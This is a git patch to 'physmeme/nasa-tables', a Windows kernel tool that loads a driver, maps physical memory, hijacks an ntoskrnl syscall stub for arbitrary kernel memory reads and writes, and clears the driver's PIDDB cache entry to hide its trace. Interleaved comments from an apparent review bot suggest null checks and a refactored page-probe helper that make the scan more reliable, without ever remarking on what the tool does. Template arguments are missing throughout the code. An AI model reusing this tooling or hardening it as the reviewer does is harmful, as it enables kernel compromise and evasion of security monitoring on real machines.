From ea2f644ac091d655888cf9aa957317cb240e14ce Mon Sep 17 00:00:00 2001 From: xerox Date: Wed, 28 Oct 2020 18:14:37 -0700 Subject: [PATCH] stability patch for physmeme... --- nasa-tables/kernel_ctx/kernel_ctx.cpp | 138 ++++++++++++++------------ nasa-tables/main.cpp | 3 +- nasa-tables/mem_ctx/mem_ctx.cpp | 3 - 3 files changed, 73 insertions(+), 71 deletions(-) diff --git a/nasa-tables/kernel_ctx/kernel_ctx.cpp b/nasa-tables/kernel_ctx/kernel_ctx.cpp index c841ae5..0ce3040 100644 --- a/nasa-tables/kernel_ctx/kernel_ctx.cpp +++ b/nasa-tables/kernel_ctx/kernel_ctx.cpp @@ -1,5 +1,4 @@ #include "kernel_ctx.h" -#include "../mem_ctx/mem_ctx.hpp" namespace nasa { @@ -8,6 +7,13 @@ namespace nasa if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer) return; + ntoskrnl_buffer = reinterpret_cast( + LoadLibraryExA( + "ntoskrnl.exe", + NULL, + DONT_RESOLVE_DLL_REFERENCES + )); + nt_rva = reinterpret_cast( util::get_module_export( "ntoskrnl.exe", @@ -16,13 +22,6 @@ namespace nasa )); nt_page_offset = nt_rva % PAGE_SIZE; - ntoskrnl_buffer = reinterpret_cast( - LoadLibraryExA( - "ntoskrnl.exe", - NULL, - DONT_RESOLVE_DLL_REFERENCES - )); - std::vector search_threads; //--- for each physical memory range, make a thread to search it for (auto ranges : util::pmem_ranges) 
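Review bot: The `LoadLibraryExA` result assigned to `ntoskrnl_buffer` in the added block (hunk at -8) is never checked, and neither is `nt_rva` from the `util::get_module_export` call just below it; both feed the `ntoskrnl_buffer + nt_rva` operand of the `memcmp` in the scan loops, so a failed load or export lookup scans physical memory against a meaningless address. Add a guard once both are set and before the search threads are created, e.g. `if (!ntoskrnl_buffer || !nt_rva) return;` (or throw, if this function's callers expect that). If that early return is taken, `ntoskrnl_buffer` is already non-null, so the re-entry check at the top of the hunk, `if (psyscall_func.load() || nt_page_offset || ntoskrnl_buffer) return;`, would treat the half-initialised context as done on the next call; clear it (or track initialisation with a dedicated flag) before returning. The enclosing function starts before this hunk and continues past it.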
@@ -43,29 +42,34 @@ namespace nasa if (begin + end <= 0x1000 * 512) { auto page_va = nasa::map_phys(begin + nt_page_offset, end); - last_mapped_virt.store((void*)page_va); - last_mapping_size.store(end); - if (page_va) { // scan every page of the physical memory range for (auto page = page_va; page < page_va + end; page += 0x1000) + { if (!is_page_found.load()) // keep scanning until its found - if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + __try { - // - // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! - // - psyscall_func.store((void*)page); - auto my_proc_base = reinterpret_cast(GetModuleHandleA(NULL)); - auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); - - if (my_proc_base != my_proc_base_from_syscall) - continue; - - is_page_found.store(true); - return; + if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + // + // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! + // + psyscall_func.store((void*)page); + auto my_proc_base = reinterpret_cast(GetModuleHandleA(NULL)); + auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); + + if (my_proc_base != my_proc_base_from_syscall) + continue; + + is_page_found.store(true); + return; + } } + __except (EXCEPTION_EXECUTE_HANDLER) {} + } + } nasa::unmap_phys(page_va, end); } } @@ -77,9 +81,6 @@ namespace nasa for (auto range = begin; range < begin + end; range += 0x1000 * 512) { auto page_va = nasa::map_phys(range + nt_page_offset, 0x1000 * 512); - last_mapped_virt.store((void*)page_va); - last_mapping_size.store(0x1000 * 512); - if (page_va) { // loop every page of 2mbs (512) 
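Review bot: The empty `__except (EXCEPTION_EXECUTE_HANDLER) {}` handler added around the memcmp/verify block swallows the fault, but `psyscall_func.store((void*)page)` has already published the candidate before `get_proc_base` is called, so a page that faults — or fails the `my_proc_base` comparison and hits `continue` — leaves `psyscall_func` pointing at a page that was never verified. If `get_proc_base` is itself dispatched through `psyscall_func` (not visible here) publishing before the check is unavoidable, so the reset belongs on both failure paths: `psyscall_func.store(nullptr);` before the `continue`, and the same statement as the handler body instead of `{}`. The scan threads created in the earlier hunk (`for (auto ranges : util::pmem_ranges)`) all store to the same atomic, so one thread's check can run through another thread's candidate; that wants either a per-thread candidate until it is verified or a comment stating why the threads cannot overlap here. The same block appears in the hunks at -87 and -110 on the next two lines; this hunk's enclosing function starts and ends outside it.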
@@ -87,21 +88,25 @@ namespace nasa { if (!is_page_found.load()) { - if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + __try { - // - // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! - // - psyscall_func.store((void*)page); - auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); - auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); - - if (my_proc_base != my_proc_base_from_syscall) - continue; - - is_page_found.store(true); - return; + if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + // + // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! + // + psyscall_func.store((void*)page); + auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); + auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); + + if (my_proc_base != my_proc_base_from_syscall) + continue; + + is_page_found.store(true); + return; + } } + __except (EXCEPTION_EXECUTE_HANDLER) {} } } nasa::unmap_phys(page_va, 0x1000 * 512); 
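Review bot: The `__try`/memcmp/verify block added here is the second of three identical copies (the others are in the hunks at -43 on the previous line and -110 on the next), differing only in the `GetModuleHandle`/`GetModuleHandleA` spelling, so every later fix has to be applied three times. Pull it into one helper that reports whether `page` is a working candidate and reduce each loop body to `if (!is_page_found.load() && probe_page(page)) { is_page_found.store(true); return; }`. Where the helper lives depends on where `psyscall_func`, `ntoskrnl_buffer`, `nt_rva` and `get_proc_base` are declared, which is outside the hunk; the sketch below assumes `kernel_ctx` members, keeps the hunk's behaviour unchanged (including leaving `psyscall_func` set after a failed probe), and guesses an integer page type because the loops cast `page` for `memcmp`. The enclosing scan function starts and ends outside this hunk.
```cpp
// Probe one candidate page: byte-match it against the loaded ntoskrnl image,
// then confirm the stub really works by resolving our own process base through it.
// `page` is assumed integer-typed (the loops cast it for memcmp); adjust to the member's type.
bool kernel_ctx::probe_page(std::uintptr_t page)
{
    __try
    {
        if (memcmp(reinterpret_cast<const void*>(page), ntoskrnl_buffer + nt_rva, 32))
            return false;

        psyscall_func.store(reinterpret_cast<void*>(page));
        const auto my_proc_base = reinterpret_cast<void*>(GetModuleHandleA(NULL));
        const auto via_syscall = reinterpret_cast<void*>(get_proc_base(GetCurrentProcessId()));
        return my_proc_base == via_syscall;
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        return false;
    }
}

// … in each of the three scan loops the per-page body becomes:
if (!is_page_found.load() && probe_page(page))
{
    is_page_found.store(true);
    return;
}
```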
@@ -110,30 +115,31 @@ namespace nasa // map the remainder and check each page of it auto page_va = nasa::map_phys(begin + end - remainder + nt_page_offset, remainder); - last_mapped_virt.store((void*)page_va); - last_mapping_size.store(remainder); - if (page_va) { for (auto page = page_va; page < page_va + remainder; page += 0x1000) { if (!is_page_found.load()) { - if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + __try { - // - // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! - // - psyscall_func.store((void*)page); - auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); - auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); - - if (my_proc_base != my_proc_base_from_syscall) - continue; - - is_page_found.store(true); - return; + if (!memcmp(reinterpret_cast(page), ntoskrnl_buffer + nt_rva, 32)) + { + // + // this checks to ensure that the syscall does indeed work. if it doesnt, we keep looking! + // + psyscall_func.store((void*)page); + auto my_proc_base = reinterpret_cast(GetModuleHandle(NULL)); + auto my_proc_base_from_syscall = reinterpret_cast(get_proc_base(GetCurrentProcessId())); + + if (my_proc_base != my_proc_base_from_syscall) + continue; + + is_page_found.store(true); + return; + } } + __except (EXCEPTION_EXECUTE_HANDLER) {} } } nasa::unmap_phys(page_va, remainder); @@ -197,12 +203,15 @@ namespace nasa ); if (mm_copy_memory) - syscall( + { + syscall + ( mm_copy_memory, buffer, address, size ); + } } void kernel_ctx::wkm(void* buffer, void* address, std::size_t size) @@ -218,12 +227,15 @@ namespace nasa ); if (mm_copy_memory) - syscall( + { + syscall + ( mm_copy_memory, address, buffer, size ); + } } void* kernel_ctx::get_physical(void* virt_addr) @@ -237,10 +249,7 @@ namespace nasa "MmGetPhysicalAddress" ); - return syscall( - mm_get_physical, - virt_addr - ); + return syscall(mm_get_physical, virt_addr); } void* kernel_ctx::get_virtual(void* addr) 
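Review bot: The brace-wrapped call added in `rkm` (hunk at -197) and `wkm` (hunk at -218) splits `syscall` and `(` onto separate lines, which nothing else in this file does — the `get_physical` hunk below writes `return syscall(mm_get_physical, virt_addr);` on one line — so one of the two layouts should be picked for all four call sites. Both functions also silently do nothing when `mm_copy_memory` is null, leaving `buffer` untouched with no way for the caller to tell; at least mark that with a comment on the `if`, e.g. `// no-op if MmCopyMemory could not be resolved; caller sees an unchanged buffer`, or have the functions report success. The bodies of `rkm` and `wkm` begin above their hunks.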
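Review bot: The collapsed `return syscall(mm_get_physical, virt_addr);` in `get_physical` (hunk at -237) issues the call without checking that the `MmGetPhysicalAddress` lookup succeeded, whereas `rkm` and `wkm` in the two hunks above guard theirs with `if (mm_copy_memory)`; a failed export lookup here goes straight into the syscall with a null target. Add `if (!mm_get_physical) return nullptr;` before the return, and the same guard for `mm_get_virtual` in `get_virtual` in the hunk on the next line (which also drops the space after the comma in `syscall(mm_get_virtual,phys_addr)`). The `get_module_export` call that sets `mm_get_physical` starts above the hunk, so its exact type is not visible; the check assumes a pointer.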
@@ -256,10 +265,7 @@ namespace nasa PHYSICAL_ADDRESS phys_addr; memcpy(&phys_addr, &addr, sizeof(addr)); - return syscall( - mm_get_virtual, - phys_addr - ); + return syscall(mm_get_virtual,phys_addr); } bool kernel_ctx::clear_piddb_cache(const std::string& file_name, const std::uint32_t timestamp) diff --git a/nasa-tables/main.cpp b/nasa-tables/main.cpp index 5aa6f3a..86a1c3c 100644 --- a/nasa-tables/main.cpp +++ b/nasa-tables/main.cpp @@ -4,11 +4,10 @@ int __cdecl main(int argc, char** argv) { - // only time driver needs to be loaded is to init physmeme/kernel_ctx... nasa::load_drv(); nasa::kernel_ctx kernel; if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp)) - std::cout << "[+] flushed PIDDB Cache for physmeme driver..." << std::endl; + std::cout << "[+] Removed PIDDB Cache entry for physmeme driver..." << std::endl; nasa::unload_drv(); const std::pair my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } }; diff --git a/nasa-tables/mem_ctx/mem_ctx.cpp b/nasa-tables/mem_ctx/mem_ctx.cpp index a1c445d..4bf3a68 100644 --- a/nasa-tables/mem_ctx/mem_ctx.cpp +++ b/nasa-tables/mem_ctx/mem_ctx.cpp @@ -100,9 +100,6 @@ namespace nasa void* mem_ctx::set_page(void* addr) { - if (!addr) - return {}; - // // table entry change. //
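Review bot: Removing the comment above `nasa::load_drv();` in main.cpp leaves no explanation of why `nasa::load_drv()` and `nasa::unload_drv()` bracket only the construction of `kernel_ctx` and the cache call, which is exactly the kind of ordering a later edit is likely to break. Keep a one-line note there, e.g. `// the driver is only needed while kernel_ctx initialises; it is unloaded right after`. The rest of `main` continues past the hunk.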